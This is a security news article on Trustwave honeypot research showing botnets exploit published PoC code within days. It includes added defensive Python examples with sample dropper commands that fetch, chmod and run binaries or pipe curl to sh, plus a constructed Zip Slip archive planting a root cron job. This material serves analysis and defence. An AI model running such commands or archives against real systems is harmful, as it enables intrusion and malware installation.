Botnets Send Exploits Within Days to Weeks After Published PoC
Six months of honeypot data show that 19% of the traffic reaching the sensors consisted of malicious exploit attempts, and that 95% of those attempts came from just three botnets.
Attackers quickly turn around real-world attacks using proof-of-concept code, taking only days to weeks to create workable exploits from published research, according to six months of data collected by researchers at Trustwave.
During the experiment, Trustwave deployed honeypots that mimicked five common enterprise appliances and found that attackers began exploiting one vulnerability within six days of the release of proof-of-concept (PoC) code, and another within 17 days. Overall, exploit scans, which include legitimate Internet-wide scanning by security professionals as well as attacker reconnaissance, accounted for 25% of HTTP and HTTPS requests, while actual attacks accounted for 19% of the traffic to the newly created servers. Nearly all of the attacks came from three botnets: Mozi, Mirai, and Kinsing.
Companies should assume that attackers will be able to reverse engineer any patch and develop their own exploit, even without a proof of concept, says Ziv Mador, vice president of security research at Trustwave.
“It’s essential to stay aware of the constant stream of newly discovered vulnerabilities, take proactive measures, and apply patches promptly to minimize the window of opportunity for threat actors,” he says.
The research highlights not only that attackers quickly pick up published exploit code, but that the resulting attacks are quickly automated by plugging them into existing botnet infrastructure. Of the 19% of traffic that attempted to exploit the researchers' honeypots, 73% came from the Mozi botnet, 14% from Kinsing, and 9% from Mirai.
All three botnets tend to focus on Internet of Things (IoT) and edge devices, such as managed file servers, mail servers, network gateways, and the industrial control systems that manage operational technology. Mozi, for example, is a peer-to-peer botnet that started by infecting consumer routers and digital video recorders (DVRs) and later added exploits for vulnerabilities in network gateway appliances. Recent updates to the Mirai botnet include the ability to exploit bugs in Tenda and Zyxel networking appliances.
Currently, Mozi is very aggressive in its efforts to find as many unprotected IoT devices as possible, says Allen West, a security researcher with Akamai.
“Security has historically not been as much of a priority on IoT devices, yet they make up a huge portion of the Internet landscape,” he says. “If it can send traffic, it’s good enough to be used as a bot. Attackers, most notably Mirai, have acknowledged this and built their entire operation around this idea.”
Grabbing Code on the Fly
To conduct the research, cybersecurity experts at Trustwave SpiderLabs deployed honeypots in six countries emulating five products — Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 BIG-IP — to look like vulnerable enterprise networks. They collected data from more than 38,000 IP addresses and captured at least 1,100 unique payloads, the researchers stated in their analysis.
The honeypots were "medium-interaction" honeypots: they could respond to attackers well enough to make an exploit appear to have succeeded, but they did not extend the charade beyond that basic level. After a successful exploit, attackers typically run _wget_ or _curl_ to download the next stage of the attack; rather than execute that command, the honeypot merely fetched the next stage itself so that it could be analyzed, says Trustwave's Mador.
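The following is an added illustration of the capture step described above; it is not Trustwave's honeypot code. It takes the shell command an attacker sends after a successful exploit and, instead of running it, pulls out the _wget_/_curl_ fetch so the second stage can be downloaded out-of-band for analysis. The sample payloads, hosts (from RFC 5737 documentation ranges), and the `StageTwo` record are constructed for the example.

```python
"""Extract second-stage download URLs from captured post-exploitation commands
without executing them (added example, not Trustwave's honeypot code)."""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed payloads in the shape IoT botnet droppers commonly use.
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://192.0.2.10/bins/mozi.m -O .i; chmod 777 .i; ./.i",
    "curl -fsSL http://198.51.100.7/kinsing.sh | sh",
    "busybox wget -q -O- http://203.0.113.5/x86 > /tmp/x86; chmod +x /tmp/x86",
    "echo hello; uname -a",          # no download: nothing should be extracted
]

SEGMENT_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")   # shell command separators
SCHEME_URL = re.compile(r"^(?:https?|ftp|tftp)://\S+$", re.I)
BARE_IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?(?:/\S*)?$")
FETCHERS = {"wget", "curl"}


@dataclass
class StageTwo:
    tool: str
    url: str
    output: Optional[str]   # where the dropper wanted to write the file, if known


def _normalise_url(token: str) -> Optional[str]:
    """wget accepts a bare host, so treat '192.0.2.1/x' as http://192.0.2.1/x."""
    if SCHEME_URL.match(token):
        return token
    if BARE_IPV4.match(token):
        return "http://" + token
    return None


def _tokens(segment: str) -> List[str]:
    try:
        return shlex.split(segment)
    except ValueError:          # unbalanced quotes in a malformed payload
        return segment.split()


def extract_stage_two(command: str) -> List[StageTwo]:
    """Heuristic parser: returns every wget/curl fetch found in `command`."""
    found: List[StageTwo] = []
    for segment in SEGMENT_SPLIT.split(command):
        tokens = _tokens(segment)
        # Handle 'sh -c "wget ..."' by recursing into quoted sub-commands.
        for t in tokens:
            if " " in t and FETCHERS.intersection(t.split()):
                found.extend(extract_stage_two(t))
        idx = next((i for i, t in enumerate(tokens) if t in FETCHERS), None)
        if idx is None:
            continue                          # 'busybox wget' is also matched
        tool, rest = tokens[idx], tokens[idx + 1:]
        url, output, remote_name, i = None, None, False, 0
        while i < len(rest):
            t = rest[i]
            if tool == "curl" and t == "-O":            # curl -O: keep remote name
                remote_name = True
            elif t in ("-O", "-o") and i + 1 < len(rest):  # wget -O f / curl -o f
                output = rest[i + 1]
                i += 1
            elif t.startswith(("-O", "-o")) and len(t) > 2 and not t.startswith("--"):
                output = t[2:]                          # wget -Ofile or -O- (stdout)
            elif t == ">" and i + 1 < len(rest):        # shell redirect of stdout
                output = rest[i + 1]
                i += 1
            elif not t.startswith("-"):
                cand = _normalise_url(t)
                if cand and url is None:
                    url = cand
            i += 1
        if url:
            if remote_name and output is None:
                output = url.rsplit("/", 1)[-1] or None
            found.append(StageTwo(tool, url, None if output == "-" else output))
    return found


def stage_two_urls(payloads: List[str]) -> List[str]:
    """Distinct second-stage URLs across a batch of captured payloads."""
    return sorted({s.url for p in payloads for s in extract_stage_two(p)})


if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print(repr(p), "->", extract_stage_two(p))
```

The URLs returned would then be fetched by the honeypot's own collector (with its own timeouts, size limits, and a sandboxed storage location), never by executing the attacker's command. The parser is a heuristic: it covers `;`, `&&`, `||`, pipes, `busybox wget`, bare IPv4 hosts, and quoted `sh -c` wrappers, but not encoded or obfuscated commands, which should simply be logged for manual review.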
“Our honeypots were configured as true vulnerable applications and that’s how they appeared in services like Shodan,” Mador says. “We successfully captured several Web shells, which are commonly used by individuals or groups involved in such activities, but due to the medium-interaction nature of our honeypot, we were unable to track the subsequent actions that attackers may have taken.”
The honeypots detected an attack against Fortra GoAnywhere MFT, a managed file transfer product, in the US and UK that attempted to upload a previously unreported Web shell. The researchers also detected attacks targeting a vulnerability in the Fortinet FortiNAC appliance (CVE-2022-39952) within six days of PoC exploit code being released. Other attacks targeted Atlassian Bitbucket servers and F5 BIG-IP devices.
Should Every Company Have a Honeypot?
While quickly patching edge and IoT devices should be a priority in general, organizations should prioritize devices for which PoC exploits have already been released or that are already being attacked in the wild.
Beyond patching, Mador suggests that companies consider deploying honeypots of their own.
“When existing security measures do not offer adequate visibility into these attacks, the deployment of a honeypot can be a valuable option to consider,” he says. “Honeypots act as additional layers of defense, luring attackers and providing valuable insights into their tactics and techniques.”
Related news
The China-linked threat actor known as Earth Lusca has been observed targeting government entities using a never-before-seen Linux backdoor called SprySOCKS. Earth Lusca was first documented by Trend Micro in January 2022, detailing the adversary's attacks against public and private sector entities across Asia, Australia, Europe, and North America. Active since 2021, the group has relied on
Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data
This Metasploit module uploads a payload to the /tmp directory along with a cron job in /etc/cron.d that executes the payload in the context of the root user. The core vulnerability is an arbitrary file write in /configWizard/keyUpload.jsp, which is reachable remotely and without authentication. When the vulnerable endpoint is sent a ZIP file, it extracts an attacker-controlled file to a directory of the attacker's choice on the target system. This issue is exploitable on FortiNAC versions 9.4 prior to 9.4.1, FortiNAC versions 9.2 prior to 9.2.6, FortiNAC versions 9.1 prior to 9.1.8, all versions of FortiNAC 8.8, all versions of FortiNAC 8.7, all versions of FortiNAC 8.6, all versions of FortiNAC 8.5, and all versions of FortiNAC 8.3.
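The flaw class described in the teaser above (an archive whose entry names steer the extracted file into a directory of the attacker's choice, such as /etc/cron.d) is usually called a Zip Slip. The following is an added illustration of the check that prevents it; it is not Fortinet's code, not the Metasploit module, and makes no claim about how FortiNAC's extractor is implemented. The hostile archive is constructed in memory for the example.

```python
"""Refuse ZIP entries that would be written outside the extraction root
(added example; not Fortinet's or the Metasploit module's code)."""
import io
import os
import tempfile
import zipfile
from typing import List, Tuple


def entry_is_safe(root: str, member_name: str) -> bool:
    """True only if `member_name`, joined to `root`, stays inside `root`."""
    root = os.path.realpath(root)
    # Absolute names and drive-qualified names are never acceptable from an upload.
    if member_name.startswith(("/", "\\")) or os.path.splitdrive(member_name)[0]:
        return False
    target = os.path.realpath(os.path.join(root, member_name))
    return os.path.commonpath([root, target]) == root


def safe_extract(data: bytes, root: str) -> Tuple[List[str], List[str]]:
    """Extract `data` under `root`; returns (extracted names, rejected names).

    Unlike ZipFile.extractall(), every entry is checked with entry_is_safe()
    first, and entries are written as plain files, so an archive cannot plant
    a symlink and then write through it.
    """
    extracted: List[str] = []
    rejected: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not entry_is_safe(root, info.filename):
                rejected.append(info.filename)
                continue
            dest = os.path.join(root, info.filename)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest) or root, exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def build_hostile_zip() -> bytes:
    """Constructed sample: one benign entry plus two traversal attempts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("license.txt", "benign content\n")
        zf.writestr("../../../etc/cron.d/job", "* * * * * root /tmp/payload\n")
        zf.writestr("/etc/cron.d/job2", "* * * * * root /tmp/payload\n")
    return buf.getvalue()


def demo() -> Tuple[List[str], List[str]]:
    """Extract the hostile archive into a throwaway directory."""
    with tempfile.TemporaryDirectory() as root:
        return safe_extract(build_hostile_zip(), root)


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    print("rejected: ", bad)
```

The check resolves the final destination with `realpath` and compares it against the root, which catches `..` sequences, absolute names, and paths that traverse an existing symlink; rejecting the whole upload on the first bad entry, rather than skipping it, is the stricter policy for an endpoint that should only ever receive well-formed archives.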
Fortinet has released fixes to address 15 security flaws, including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610, is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. "A buffer underwrite ('buffer underflow') vulnerability in
Organizations are urged to update to the latest versions of FortiNAC to patch a flaw that allows unauthenticated attackers to write arbitrary files on the system.
Fortinet has released security updates to address 40 vulnerabilities in its software lineup, including FortiWeb, FortiOS, FortiNAS, and FortiProxy, among others. Two of the 40 flaws are rated Critical, 15 are rated High, 22 are rated Medium, and one is rated Low in severity. Top of the list is a severe bug residing in the FortiNAC network access control solution (CVE-2022-39952, CVSS score: 9.8)